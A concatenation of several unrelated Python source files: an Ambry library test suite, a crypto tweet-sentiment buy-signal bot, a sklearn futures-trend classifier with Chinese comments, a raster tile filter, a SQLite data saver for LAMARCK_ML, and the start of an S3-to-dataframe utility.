f1 = l1.get('tf1')
self.assertIsNotNone(f1)
self.assertTrue(os.path.exists(f1))
def test_partitions(self):
from ambry.identity import PartitionNameQuery
from sqlalchemy.exc import IntegrityError
l = self.get_library()
l.purge()
#
# Create all possible combinations of partition names
#
s = set()
table = self.bundle.schema.tables[0]
p = (('time','time2'),('space','space3'),('grain','grain4'))
p += p
pids = {}
for i in range(4):
for j in range(4):
pid = self.bundle.identity.as_partition(**dict(p[i:i+j+1]))
pids[pid.fqname] = pid
for pid in pids.values():
print pid.sname
try:
# One will fail with an integrity eorror, but it doesn't matter for this test.
part = self.bundle.partitions.new_db_partition(**pid.dict)
part.create()
parts = self.bundle.partitions._find_orm(PartitionNameQuery(vid=pid.vid)).all()
self.assertIn(pid.sname, [p.name for p in parts])
except IntegrityError:
pass
l.put(self.bundle) # Install the partition references in the library.
b = l.get(self.bundle.identity)
for partition in self.bundle.partitions:
l.put(partition)
l.put(partition)
print partition.identity.sname
r = l.get(partition.identity)
self.assertIsNotNone(r)
self.assertEquals( partition.identity.id_, r.partition.identity.id_)
r = l.get(partition.identity.id_)
self.assertIsNotNone(r)
self.assertEquals(partition.identity.id_, r.partition.identity.id_)
hdf = l.get('source-dataset-subset-variation-hdf5-hdf')
print hdf.database.path
print hdf.partition.database.path
def test_s3(self):
#ambry.util.get_logger('ambry.filesystem').setLevel(logging.DEBUG)
# Set up the test directory and make some test files.
from ambry.cache import new_cache
root = self.rc.group('filesystem').root
os.makedirs(root)
testfile = os.path.join(root,'testfile')
with open(testfile,'w+') as f:
for i in range(1024):
f.write('.'*1023)
f.write('\n')
#fs = self.bundle.filesystem
#local = fs.get_cache('downloads')
cache = new_cache(self.rc.filesystem('s3'))
repo_dir = cache.cache_dir
print "Repo Dir: {}".format(repo_dir)
for i in range(0,10):
logger.info("Putting "+str(i))
cache.put(testfile,'many'+str(i))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many1')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many2')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many3')))
p = cache.get('many1')
self.assertTrue(p is not None)
self.assertTrue(os.path.exists(os.path.join(repo_dir, 'many1')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many2')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many3')))
p = cache.get('many2')
self.assertTrue(p is not None)
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many3')))
self.assertTrue(os.path.exists(os.path.join(repo_dir, 'many7')))
p = cache.get('many3')
self.assertTrue(p is not None)
self.assertTrue(os.path.exists(os.path.join(repo_dir, 'many3')))
self.assertFalse(os.path.exists(os.path.join(repo_dir, 'many7')))
def test_query(self):
from ambry.library.query import QueryCommand
tests = [
"column.name = 'column.name', identity.id='identity',",
"column.name = 'column.name', identity.id='identity' ",
"column.name = 'column.name' identity.id = 'identity'",
"partition.vname ='partition.vname'",
"partition.vname = '%partition.vname%'",
"identity.name = '%clarinova foo bar%'"
]
fails = [
"column.name='foobar"
]
for s in tests:
qc = QueryCommand.parse(s)
print qc
for s in fails:
self.assertRaises(QueryCommand.ParseError, QueryCommand.parse, s)
def test_files(self):
l = self.get_library()
l.purge()
fls = l.files
for e in [ (str(i), str(j) ) for i in range(10) for j in range(3) ]:
f = l.files.new_file(path='path'+e[0], ref="{}-{}".format(*e), group=e[1], type_=e[1])
l.files.merge(f)
def refs(itr):
return [ f.ref for f in i ]
print l.files.query.path('path3').first
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test))
return suite
if __name__ == "__main__":
unittest.TextTestRunner().run(suite()) |
#!/usr/bin/env python
import requests
from textblob import TextBlob
from twitter import Twitter
import time
import ccxt
from coins import coins
from notifier import Notifier
symbol_name = {}
name_symbol = {}
symbol_exchange = {}
bot = None
notifier = Notifier()
def get_coins_bittrex():
exchange = ccxt.bittrex()
markets = exchange.fetch_markets()
try:
for market in markets:
market = market['info']
symbol = market["MarketCurrency"]
name = market["MarketCurrencyLong"].lower()
symbol_name[symbol] = name
name_symbol[name] = symbol
symbol_exchange[symbol] = 'bittrex'
# print(f'Found {len(markets)} markets.')
except Exception as e:
print(f'Failed to get markets from Bittrex ({e})')
def get_coins_liqui():
exchange = ccxt.liqui()
markets = exchange.fetch_markets()
try:
for market in markets:
symbol = market['base']
try:
name = coins[symbol].lower()
except Exception as e:
# print(f'Failed to match ' + symbol + '. Consider adding to coins.py.')
continue
symbol_name[symbol] = name
name_symbol[name] = symbol
symbol_exchange[symbol] = 'liqui'
# print(f'Found {len(markets)} markets.')
except Exception as e:
print(f'Failed to get markets from Liqui ({e})')
def extract_symbols(text):
"""Return trading symbols of cryptocurrencies in text in format (symbol, name) e.g. ("BTC", "bitcoin")"""
symbols = set()
ignore_tags = ["DT"]
words = [w[0].lower() for w in TextBlob(text).tags if w[1] not in ignore_tags]
for word in words:
if word.upper() in symbol_name:
symbols.add((word.upper(), symbol_name[word.upper()]))
# print(f'Found symbol: {word.upper()}')
elif word.lower() in name_symbol:
symbols.add((name_symbol[word.lower()], word.lower()))
# print(f'Found symbol: {name_symbol[word]}')
return symbols
def get_sentiment_analysis(text, coins):
"""Return the sentiment analysis of coins mentioned in text in
the form of a dictionary that aggregates the sentiment of
sentences that include each of the coins.
"""
sentiment = {}
blob = TextBlob(text)
for sentence in blob.sentences:
lowercase_words = [x.lower() for x in sentence.words]
for coin in coins:
if coin[0].lower() in lowercase_words or coin[1].lower() in lowercase_words:
try:
sentiment[coin] += sentence.sentiment.polarity
except:
sentiment[coin] = sentence.sentiment.polarity
return sentiment, blob.sentiment.polarity
def get_verdict(sentiment, overall):
"""Use the result from get_sentiment_analysis to determine which coins to buy and
return an array of coin symbols e.g. ["XVG", "DGB"]"""
to_buy = [x for x in sentiment.keys() if sentiment[x] >= 0]
if overall >= 0:
# Filter out large coins (ideally take out coins in top 10)
to_buy = [x for x in to_buy if x[0] not in ["BTC", "LTC", "ETH"]]
return to_buy
else:
return []
def analyze(text):
"""
1. Extract symbols
2. Get sentiment analysis
3. Determine which coins to buy
"""
coins = extract_symbols(text)
if coins:
sentiment, overall = get_sentiment_analysis(text, coins)
to_buy = get_verdict(sentiment, overall)
return to_buy
return []
def filter_coins(to_buy):
f = ['OK', 'PAY', 'BLOCK', 'RISE', 'TIME']
filtered = [x for x in to_buy if x[0] not in f]
return filtered
def twitter_tweet_callback(text, user, link):
to_buy = analyze(text)
to_buy = filter_coins(to_buy)
if len(to_buy) > 0:
msg = str(to_buy) + ".\nTweet: " + text + ".\n" + link
# print(msg)
notifier.buy(msg)
if __name__ == "__main__":
# Populate coins. Ordering determines exchange at which to buy.
# Lowest to highest priority (e.g. last call is most prioritized exchange).
get_coins_bittrex()
get_coins_liqui()
#print(symbol_name)
#print(name_symbol)
# Twitter stream
twitter = Twitter(setup=['stream'], tweet_callback=twitter_tweet_callback)
|
# encoding: UTF-8
import warnings
warnings.filterwarnings("ignore")
from pymongo import MongoClient, ASCENDING
import pandas as pd
import numpy as np
from datetime import datetime
import talib
import matplotlib.pyplot as plt
import scipy.stats as st
from sklearn.model_selection import train_test_split
# LogisticRegression 逻辑回归
from sklearn.linear_model import LogisticRegression
# DecisionTreeClassifier 决策树
from sklearn.tree import DecisionTreeClassifier
# SVC 支持向量分类
from sklearn.svm import SVC
# MLP 神经网络
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import GridSearchCV
class DataAnalyzerforSklearn(object):
"""
这个类是为了SVM做归纳分析数据,以未来6个bar的斜率线性回归为判断分类是否正确。
不是直接分析HLOC,而且用下列分非线性参数(就是和具体点位无关)
1.Percentage
2.std
4.MACD
5.CCI
6.ATR
7. 该bar之前的均线斜率
8. RSI
"""
def __init__(self, exportpath="C:\\Project\\", datformat=['datetime', 'high', 'low', 'open', 'close','volume']):
self.mongohost = None
self.mongoport = None
self.db = None
self.collection = None
self.df = pd.DataFrame()
self.exportpath = exportpath
self.datformat = datformat
self.startBar = 2
self.endBar = 12
self.step = 2
self.pValue = 0.015
#-----------------------------------------导入数据-------------------------------------------------
def db2df(self, db, collection, start, end, mongohost="localhost", mongoport=27017, export2csv=False):
"""读取MongoDB数据库行情记录,输出到Dataframe中"""
self.mongohost = mongohost
self.mongoport = mongoport
self.db = db
self.collection = collection
dbClient = MongoClient(self.mongohost, self.mongoport, connectTimeoutMS=500)
db = dbClient[self.db]
cursor = db[self.collection].find({'datetime':{'$gte':start, '$lt':end}}).sort("datetime",ASCENDING)
self.df = pd.DataFrame(list(cursor))
self.df = self.df[self.datformat]
self.df = self.df.reset_index(drop=True)
path = self.exportpath + self.collection + ".csv"
if export2csv == True:
self.df.to_csv(path, index=True, header=True)
return self.df
def csv2df(self, csvpath, dataname="csv_data", export2csv=False):
"""读取csv行情数据,输入到Dataframe中"""
csv_df = pd.read_csv(csvpath)
self.df = csv_df[self.datformat]
self.df["datetime"] = pd.to_datetime(self.df['datetime'])
self.df = self.df.reset_index(drop=True)
path = self.exportpath + dataname + ".csv"
if export2csv == True:
self.df.to_csv(path, index=True, header=True)
return self
def df2Barmin(self, inputdf, barmins, crossmin=1, export2csv=False):
"""输入分钟k线dataframe数据,合并多多种数据,例如三分钟/5分钟等,如果开始时间是9点1分,crossmin = 0;如果是9点0分,crossmin为1"""
dfbarmin = pd.DataFrame()
highBarMin = 0
lowBarMin = 0
openBarMin = 0
volumeBarmin = 0
datetime = 0
for i in range(0, len(inputdf) - 1):
bar = inputdf.iloc[i, :].to_dict()
if openBarMin == 0:
openBarmin = bar["open"]
if highBarMin == 0:
highBarMin = bar["high"]
else:
highBarMin = max(bar["high"], highBarMin)
if lowBarMin == 0:
lowBarMin = bar["low"]
else:
lowBarMin = min(bar["low"], lowBarMin)
closeBarMin = bar["close"]
datetime = bar["datetime"]
volumeBarmin += int(bar["volume"])
# X分钟已经走完
if not (bar["datetime"].minute + crossmin) % barmins: # 可以用X整除
# 生成上一X分钟K线的时间戳
barMin = {'datetime': datetime, 'high': highBarMin, 'low': lowBarMin, 'open': openBarmin,
'close': closeBarMin, 'volume' : volumeBarmin}
dfbarmin = dfbarmin.append(barMin, ignore_index=True)
highBarMin = 0
lowBarMin = 0
openBarMin = 0
volumeBarmin = 0
if export2csv == True:
dfbarmin.to_csv(self.exportpath + "bar" + str(barmins)+ str(self.collection) + ".csv", index=True, header=True)
return dfbarmin
#-----------------------------------------开始计算指标-------------------------------------------------
def dfcci(self, inputdf, n, export2csv=True):
"""调用talib方法计算CCI指标,写入到df并输出"""
dfcci = inputdf
dfcci["cci"] = None
for i in range(n, len(inputdf)):
df_ne = inputdf.loc[i - n + 1:i, :]
cci = talib.CCI(np.array(df_ne["high"]), np.array(df_ne["low"]), np.array(df_ne["close"]), n)
dfcci.loc[i, "cci"] = cci[-1]
dfcci = dfcci.fillna(0)
dfcci = dfcci.replace(np.inf, 0)
if export2csv == True:
dfcci.to_csv(self.exportpath + "dfcci" + str(self.collection) + ".csv", index=True, header=True)
return dfcci
def dfatr(self, inputdf, n, export2csv=True):
"""调用talib方法计算ATR指标,写入到df并输出"""
dfatr = inputdf
for i in range((n+1), len(inputdf)):
df_ne = inputdf.loc[i - n :i, :]
atr = talib.ATR(np.array(df_ne["high"]), np.array(df_ne["low"]), np.array(df_ne["close"]), n)
dfatr.loc[i, "atr"] = atr[-1]
dfatr = dfatr.fillna(0)
dfatr = dfatr.replace(np.inf, 0)
if export2csv == True:
dfatr.to_csv(self.exportpath + "dfatr" + str(self.collection) + ".csv", index=True, header=True)
return dfatr
def dfrsi(self, inputdf, n, export2csv=True):
"""调用talib方法计算ATR指标,写入到df并输出"""
dfrsi = inputdf
dfrsi["rsi"] = None
for i in range(n+1, len(inputdf)):
df_ne = inputdf.loc[i - n :i, :]
rsi = talib.RSI(np.array(df_ne["close"]), n)
dfrsi.loc[i, "rsi"] = rsi[-1]
dfrsi = dfrsi.fillna(0)
dfrsi = dfrsi.replace(np.inf, 0)
if export2csv == True:
dfrsi.to_csv(self.exportpath + "dfrsi" + str(self.collection) + ".csv", index=True, header=True)
return dfrsi
def Percentage(self, inputdf, export2csv=True):
"""调用talib方法计算CCI指标,写入到df并输出"""
dfPercentage = inputdf
# dfPercentage["Percentage"] = None
for i in range(1, len(inputdf)):
# if dfPercentage.loc[i,"close"]>dfPercentage.loc[i,"open"]:
# percentage = ((dfPercentage.loc[i,"high"] - dfPercentage.loc[i-1,"close"])/ dfPercentage.loc[i-1,"close"])*100
# else:
# percentage = (( dfPercentage.loc[i,"low"] - dfPercentage.loc[i-1,"close"] )/ dfPercentage.loc[i-1,"close"])*100
if dfPercentage.loc[ i - 1, "close"] == 0.0:
percentage = 0
else:
percentage = ((dfPercentage.loc[i, "close"] - dfPercentage.loc[i - 1, "close"]) / dfPercentage.loc[ i - 1, "close"]) * 100.0
dfPercentage.loc[i, "Perentage"] = percentage
dfPercentage = dfPercentage.fillna(0)
dfPercentage = dfPercentage.replace(np.inf, 0)
if export2csv == True:
dfPercentage.to_csv(self.exportpath + "Percentage_" + str(self.collection) + ".csv", index=True, header=True)
return dfPercentage
def dfMACD(self, inputdf, n, export2csv=False):
"""调用talib方法计算MACD指标,写入到df并输出"""
dfMACD = inputdf
for i in range(n, len(inputdf)):
df_ne = inputdf.loc[i - n + 1:i, :]
macd,signal,hist = talib.MACD(np.array(df_ne["close"]),12,26,9)
dfMACD.loc[i, "macd"] = macd[-1]
dfMACD.loc[i, "signal"] = signal[-1]
dfMACD.loc[i, "hist"] = hist[-1]
dfMACD = dfMACD.fillna(0)
dfMACD = dfMACD.replace(np.inf, 0)
if export2csv == True:
dfMACD.to_csv(self.exportpath + "macd" + str(self.collection) + ".csv", index=True, header=True)
return dfMACD
def dfSTD(self, inputdf, n, export2csv=False):
"""调用talib方法计算MACD指标,写入到df并输出"""
dfSTD = inputdf
for i in range(n, len(inputdf)):
df_ne = inputdf.loc[i - n + 1:i, :]
std = talib.STDDEV(np.array(df_ne["close"]),n)
dfSTD.loc[i, "std"] = std[-1]
dfSTD = dfSTD.fillna(0)
dfSTD = dfSTD.replace(np.inf, 0)
if export2csv == True:
dfSTD.to_csv(self.exportpath + "dfSTD" + str(self.collection) + ".csv", index=True, header=True)
return dfSTD
#-----------------------------------------加入趋势分类-------------------------------------------------
def addTrend(self, inputdf, trendsetp=6, export2csv=False):
"""以未来6个bar的斜率线性回归为判断分类是否正确"""
dfTrend = inputdf
for i in range(1, len(dfTrend) - trendsetp - 1):
histRe = np.array(dfTrend["close"])[i:i + trendsetp]
xAixs = np.arange(trendsetp) + 1
res = st.linregress(y=histRe, x=xAixs)
if res.pvalue < self.pValue + 0.01:
if res.slope > 0.5:
dfTrend.loc[i, "tradeindictor"] = 1
elif res.slope < -0.5:
dfTrend.loc[i, "tradeindictor"] = -1
dfTrend = dfTrend.fillna(0)
dfTrend = dfTrend.replace(np.inf, 0)
if export2csv == True:
dfTrend.to_csv(self.exportpath + "addTrend" + str(self.collection) + ".csv", index=True, header=True)
return dfTrend
def GirdValuate(X_train, y_train):
"""1)LogisticRegression
逻辑回归
2)DecisionTreeClassifier
决策树
3)SVC
支持向量分类
4)MLP
神经网络"""
clf_DT=DecisionTreeClassifier()
param_grid_DT= {'max_depth': [1,2,3,4,5,6]}
clf_Logit=LogisticRegression()
param_grid_logit= {'solver': ['liblinear','lbfgs','newton-cg','sag']}
clf_svc=SVC()
param_grid_svc={'kernel':('linear', 'poly', 'rbf', 'sigmoid'),
'C':[1, 2, 4],
'gamma':[0.125, 0.25, 0.5 ,1, 2, 4]}
clf_mlp = MLPClassifier()
param_grid_mlp= {"hidden_layer_sizes": [(100,), (100, 30)],
"solver": ['adam', 'sgd', 'lbfgs'],
"max_iter": [20],
"verbose": [False]
}
#打包参数集合
clf=[clf_DT,clf_Logit,clf_mlp,clf_svc]
param_grid=[param_grid_DT,param_grid_logit,param_grid_mlp,param_grid_svc]
from sklearn.model_selection import StratifiedKFold # 交叉验证
kflod = StratifiedKFold(n_splits=10, shuffle=True, random_state=7) # 将训练/测试数据集划分10个互斥子集,这样方便多进程测试
#网格测试
for i in range(0,4):
grid=GridSearchCV(clf[i], param_grid[i], scoring='accuracy',n_jobs = -1,cv = kflod)
grid.fit(X_train, y_train)
print (grid.best_params_,': ',grid.best_score_)
if __name__ == '__main__':
# 读取数据
# exportpath = "C:\\Users\shui0\OneDrive\Documents\Project\\"
exportpath = "C:\Project\\"
DA = DataAnalyzerforSklearn(exportpath)
#数据库导入
start = datetime.strptime("20180501", '%Y%m%d')
end = datetime.strptime("20190501", '%Y%m%d')
df = DA.db2df(db="VnTrader_1Min_Db", collection="rb8888", start = start, end = end)
df5min = DA.df2Barmin(df, 5)
df5minAdd = DA.addTrend(df5min, export2csv=True)
df5minAdd = DA.dfMACD(df5minAdd, n=34, export2csv=True)
df5minAdd = DA.dfatr(df5minAdd, n=25, export2csv=True)
df5minAdd = DA.dfrsi(df5minAdd, n=35, export2csv=True)
df5minAdd = DA.dfcci(df5minAdd,n = 30,export2csv=True)
df5minAdd = DA.dfSTD(df5minAdd, n=30, export2csv=True)
df5minAdd = DA.Percentage(df5minAdd,export2csv = True)
#划分测试验证。
df_test = df5minAdd.loc[60:,:] #只从第60个开始分析,因为之前很多是空值
y= np.array(df_test["tradeindictor"]) #只保留结果趋势结果,转化为数组
X = df_test.drop(["tradeindictor","close","datetime","high","low","open","volume"],axis = 1).values #不是直接分析HLOC,只保留特征值,转化为数组
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.3,random_state=0) #三七
print("训练集长度: %s, 测试集长度: %s" %(len(X_train),len(X_test)))
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import SelectPercentile
from sklearn.feature_selection import mutual_info_classif
#特征工作,可以按照百分比选出最高分特征类,取最优70%,也可以用SelectKBest,指定要几个特征类。
print(X_train.shape)
selectPer = SelectPercentile(mutual_info_classif, percentile=70)
# selectPer = SelectKBest(mutual_info_classif, k=7)
X_train = selectPer.fit_transform(X_train, y_train)
print(X_train.shape)
X_test = selectPer.transform(X_test)
# 也可以用Fpr选择
# selectFea=SelectFpr(alpha=0.01)
# X_train_new = selectFea.fit_transform(X_train, y_train)
# X_test_new = selectFea.transform(X_test)
# 这里使用下面模式进行分析,然后利用网格调参
GirdValuate(X_train,y_train)
# 使用选取最好的模型,进行测试看看拼接
# • 模型预测:model.predict()
# • Accuracy:metrics.accuracy_score()
# • Presicion:metrics.precision_score()
# • Recall:metrics.recall_score()
from sklearn import metrics
clf_selected=MLPClassifier(hidden_layer_sizes=(100,30), max_iter=20, solver='adam') #此处填入网格回测最优模型和参数,
# {'hidden_layer_sizes': (100, 30), 'max_iter': 20, 'solver': 'adam', 'verbose': False} : 0.9897016507648039
clf_selected.fit(X_train, y_train)
y_pred = clf_selected.predict(X_test)
#accuracy
accuracy=metrics.accuracy_score(y_true=y_test, y_pred=y_pred)
print ('accuracy:',accuracy)
#precision
precision=metrics.precision_score(y_true=y_test, y_pred=y_pred,average="micro")
print ('precision:',precision)
#recall
recall=metrics.recall_score(y_true=y_test, y_pred=y_pred,average="micro")
print ('recall:',recall)
#实际值和预测值
print (y_test)
print (y_pred)
dfresult = pd.DataFrame({'Actual':y_test,'Predict':y_pred})
dfresult.to_csv(exportpath + "result" + ".csv", index=True, header=True)
from sklearn.externals import joblib
#模型保存到本地
joblib.dump(clf_selected,'clf_selected.m')
#模型的恢复
clf_tmp=joblib.load('clf_selected.m') |
<reponame>gfrancis-ALElab/Arctic_UNet
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 23 10:06:45 2021
Functions for filtering tiles if containing areas of no data
@author: <NAME>
email: <EMAIL>
"""
import os
import numpy as np
import glob
import rasterio
import rasterio.features as features
import pandas as pd
import geopandas as gpd
import matplotlib.pyplot as plt
from PIL import Image
from shapely import speedups
speedups.disable()
from shapely.geometry import shape
import warnings
warnings.filterwarnings("ignore")
###return True if bad & False if good
def data_check(M):
return ((len(np.unique(M)) == 1) or (np.unique(M)[0] == 0))
def get_name(file_location):
filename = file_location.split('/')[-1]
filename = filename.split('.')
return filename[0]
def remove(lib, truths, overlap_only=True):
total_tiles = len([name for name in os.listdir(lib)
if os.path.isfile(lib + '/' + name)])
### keep only overlap tiles
if overlap_only:
print('\nFiltering non-intersecting tiles...')
count = 0
r = 0
for pic in glob.glob(lib + '/*.tif'):
geo_list = []
with rasterio.open(pic) as dataset:
# copy meta data for mask
meta = dataset.meta.copy()
# Read the dataset's valid data mask as a ndarray.
mask = dataset.dataset_mask()
# Extract feature shapes and values from the array.
for g, val in rasterio.features.shapes(
mask, transform=dataset.transform):
# Transform shapes from the dataset's own coordinate
geom = rasterio.warp.transform_geom(
dataset.crs, dataset.crs, g, precision=6)
geo_list.append(geom)
l = []
for k in range(len(geo_list)):
l.append(shape(geo_list[k]))
df = pd.DataFrame(l)
raster_outline = gpd.GeoDataFrame(geometry=df[0], crs=dataset.crs)
### only consider ground truths included in current patch to save time
intersection = gpd.overlay(truths, raster_outline, how='intersection')
if intersection.empty == True:
# print('Removing: %s'%pic)
os.remove(pic)
r += 1
# else:
# fn = get_name(pic)
# print('Ground Truth Overlap at: %s'%fn)
count += 1
print('Total removed: %s'%r)
print('%s files remaining'%(total_tiles-r))
print('Re-numbering...')
count = 0
for pic in glob.glob(lib + '/*.tif'):
os.rename(pic, lib + '/n%s.tif'%count)
count += 1
count = 0
for pic in glob.glob(lib + '/*.tif'):
os.rename(pic, lib + '/%s.tif'%count)
count += 1
print('\nFiltering any remaining bad tiles...')
for pic in glob.glob(lib + '/*.tif'):
# print('Filtering: %s / %s'%(count+1, total_tiles))
img = Image.open(pic)
geo_list = []
with rasterio.open(pic) as dataset:
# Read the dataset's metadata
meta = dataset.meta.copy()
### remove tile if missing data (blank white areas)
if data_check(img):
dataset.close()
os.remove(pic)
r += 1
continue
### remove if not square
if meta['height'] != meta['width']:
dataset.close()
os.remove(pic)
r += 1
print('Total removed: %s'%r)
print('%s files remaining'%(total_tiles-r))
print('Re-numbering...')
count = 0
for pic in glob.glob(lib + '/*.tif'):
os.rename(pic, lib + '/n%s.tif'%count)
count += 1
count = 0
for pic in glob.glob(lib + '/*.tif'):
os.rename(pic, lib + '/%s.tif'%count)
count += 1
return
|
<reponame>JonasDHomburg/LAMARCK<gh_stars>1-10
import sqlite3 as db
import time
import os
from LAMARCK_ML.individuals import IndividualInterface
from LAMARCK_ML.models.models import GenerationalModel
from LAMARCK_ML.reproduction import AncestryEntity
from LAMARCK_ML.reproduction.Ancestry_pb2 import AncestryProto
from LAMARCK_ML.utils.dataSaver.dbConnection import DBConstants
from LAMARCK_ML.utils.dataSaver.interface import DataSaverInterface
from LAMARCK_ML.individuals.implementations.NetworkIndividual_pb2 import NetworkIndividualProto
from LAMARCK_ML.individuals.Individual_pb2 import IndividualProto
class DSSqlite3(DataSaverInterface):
arg_FILE = 'file'
arg_SAVE_ALL = 'save_all'
def __init__(self, **kwargs):
super(DSSqlite3, self).__init__(**kwargs)
self.save_all = kwargs.get(self.arg_SAVE_ALL, False)
self._file = kwargs.get(self.arg_FILE, 'default.db3')
self._path = os.path.dirname(self._file)
if self._path == '':
self._path = './'
if (not os.path.exists(self._path)) and (self._path != ''):
os.makedirs(self._path)
self.conn = db.connect(self._file)
self.setup_db()
def __del__(self):
self.conn.close()
def setup_db(self):
cursor = self.conn.cursor()
while True:
try:
cursor.execute(
"CREATE TABLE IF NOT EXISTS {} (rowid INTEGER PRIMARY KEY autoincrement, real_timestamp INTEGER, "
"abstract_timestamp INTEGER, id_name TEXT, serialized_file TEXT);".format(
DBConstants.table_individual.value[0]))
except db.OperationalError:
continue
break
while True:
try:
cursor.execute(
"CREATE TABLE IF NOT EXISTS {} (rowid INTEGER PRIMARY KEY autoincrement, real_timestamp INTEGER, "
"abstract_timestamp INTEGER, operation VARCHAR(8), descendant TEXT, serialized BLOB)".format(
DBConstants.table_ancestry.value[0]))
except db.OperationalError:
continue
break
self.conn.commit()
cursor.close()
def get_individual_by_name(self, name):
# cursor = self.conn.cursor()
# cursor.execute("SELECT serialized FROM {} WHERE id_name=?".format(DBConstants.table_individual.value[0]), [name])
# fetched = cursor.fetchone()
# last = None
# while fetched:
# last = fetched[0]
# fetched = cursor.fetchone()
# cursor.close()
with open(self._path + '/' + name + '.pb', 'rb') as f:
last = f.read()
ind = IndividualInterface.__new__(IndividualInterface)
ind.__setstate__(last)
return ind
def end_evaluate(self, func):
def end_evaluate_wrapper(model: GenerationalModel):
real_timestamp = int(time.time())
abstract_timestamp = model.abstract_timestamp
statement = "INSERT INTO {} (real_timestamp, abstract_timestamp, id_name, serialized_file) " \
"VALUES (?, ?, ?, ?);".format(DBConstants.table_individual.value[0])
for individual in model.generation:
cursor = self.conn.cursor()
cursor.execute(statement, [real_timestamp,
abstract_timestamp,
individual.id_name,
individual.id_name + '.pb'])
self.conn.commit()
cursor.close()
with open(self._path + '/' + individual.id_name + '.pb', 'wb') as f:
_bytes = individual.__getstate__()
f.write(_bytes)
del _bytes
func()
return end_evaluate_wrapper
def end_reproduce(self, func):
def end_reproduce_wrapper(model):
real_timestamp = int(time.time())
abstract_timestamp = model.abstract_timestamp
statement_rep = "INSERT INTO {} (real_timestamp, abstract_timestamp, operation, descendant, serialized) " \
"VALUES (?, ?, ?, ?, ?);".format(
DBConstants.table_ancestry.value[0])
if self.save_all:
statement_ind = "INSERT INTO {} (real_timestamp, abstract_timestamp, id_name, serialized_file) " \
"VALUES (?, ?, ?, ?);".format(DBConstants.table_individual.value[0])
for pool in model._REPRODUCTION_POOLS:
for individual in pool:
cursor = self.conn.cursor()
cursor.execute(statement_ind, [real_timestamp,
abstract_timestamp,
individual.id_name,
individual.id_name + '.pb'])
with open(self._path + '/' + individual.id_name + '.pb', 'wb') as f:
_bytes = individual.__getstate__()
f.write(_bytes)
f.close()
self.conn.commit()
cursor.close()
del _bytes
for _, ancestry in model.reproduction:
for anc in ancestry:
cursor = self.conn.cursor()
_state = anc.__getstate__()
cursor.execute(statement_rep, [real_timestamp,
abstract_timestamp,
anc.method,
anc.descendant,
db.Binary(_state)])
self.conn.commit()
cursor.close()
del _state
func()
return end_reproduce_wrapper
def get_ancestry_for_ind(self, ind_name):
cursor = self.conn.cursor()
cursor.execute("SELECT abstract_timestamp, serialized FROM {} WHERE descendant=?;".format(
DBConstants.table_ancestry.value[0]), [ind_name])
fetched = cursor.fetchone()
last = None
while fetched:
last = fetched
fetched = cursor.fetchone()
cursor.close()
if last is None:
return None, None
pb = AncestryProto()
pb.ParseFromString(last[1])
return last[0], AncestryEntity.from_pb(pb)
def get_ancestries(self):
cursor = self.conn.cursor()
while True:
try:
cursor.execute("SELECT abstract_timestamp, serialized FROM {};".format(
DBConstants.table_ancestry.value[0]))
except db.OperationalError:
continue
break
result = []
for abstract_time, pb_bytes in cursor.fetchall():
pb = AncestryProto()
pb.ParseFromString(pb_bytes)
result.append((abstract_time, AncestryEntity.from_pb(pb)))
cursor.close()
return result
def get_individual_names(self):
cursor = self.conn.cursor()
while True:
try:
cursor.execute("SELECT id_name FROM {};".format(DBConstants.table_individual.value[0]))
except db.OperationalError:
continue
break
result = set([id_[0] for id_ in cursor.fetchall()])
cursor.close()
return result
def time_stamps_by_individual_name(self, individual_name):
cursor = self.conn.cursor()
while True:
try:
cursor.execute("SELECT real_timestamp, abstract_timestamp FROM {} WHERE id_name=?;".format(
DBConstants.table_individual.value[0]), [individual_name])
except db.OperationalError:
continue
break
result = cursor.fetchall()
cursor.close()
return result
def get_abstract_time_stamps(self):
cursor = self.conn.cursor()
while True:
try:
cursor.execute("SELECT DISTINCT abstract_timestamp FROM {};".format(
DBConstants.table_individual.value[0]))
except db.OperationalError:
continue
break
result = [ts[0] for ts in cursor.fetchall()]
cursor.close()
return result
def get_individual_names_by_abstract_time_stamp(self, time_stamp):
cursor = self.conn.cursor()
cursor.execute("SELECT id_name FROM {} WHERE abstract_timestamp=?;".format(
DBConstants.table_individual.value[0]), [time_stamp])
result = [name[0] for name in cursor.fetchall()]
cursor.close()
return result
def get_individual_metrics(self, name):
with open(self._path + '/' + name + '.pb', 'rb') as f:
last = f.read()
proto = NetworkIndividualProto()
# proto = IndividualProto()
proto.ParseFromString(last)
return dict([(m.id_name, m.value) for m in proto.baseIndividual.metrics])
# return dict([(m.id_name, m.value) for m in proto.metrics])
def get_individual_functions(self, name):
with open(self._path + '/' + name + '.pb', 'rb') as f:
last = f.read()
proto = NetworkIndividualProto()
proto.ParseFromString(last)
return [f.id_name for f in proto.networks[0].functions]
|
<reponame>decathloncanada/data-utils<filename>data_utils/df.py
# -*- coding: utf-8 -*-
"""
data_utils.df
~~~~~~~~~~~~~
This module contains the functions related to dataframe manipulation.
"""
import os
import io
import pandas as pd
import numpy as np
import tablib
from .utils import (_clear_model_table,
_convert_df_to_dataset,
_create_filepath_if_nonexistent)
def import_s3_csv_to_df(s3client,
bucket,
key,
sep=';',
header=0,
compression='gzip',
usecols=None,
dtype=None,
error_bad_lines=False,
drop_id=True):
"""
Returns a dataframe based on thecompressed csv at the given key in the given bucket
:s3client: boto3.session.Session.client that represents a connection with s3
:bucket: string representing the s3 bucket's name
:key: string representing the filepath in the s3 bucket
:sep: string representing the seperation in the compressed csv, default: ';'
:header: row number to use as the column names, default: 0
:compression: string representing the type of compression on the file, default: 'gzip'
:dtype: dictionary {attribute name: object type}
:usecols: list of attributes to read from the csv
"""
response = s3client.get_object(Bucket=bucket, Key=key)
df = pd.read_csv(io.BytesIO(response['Body'].read()),
sep=sep,
header=header,
compression=compression,
dtype=dtype,
usecols=usecols,
error_bad_lines= error_bad_lines)
# drop duplicate to fix
# duplicate 'id' column in the df
try:
if drop_id:
df.drop('id', inplace=True, axis=1)
except KeyError:
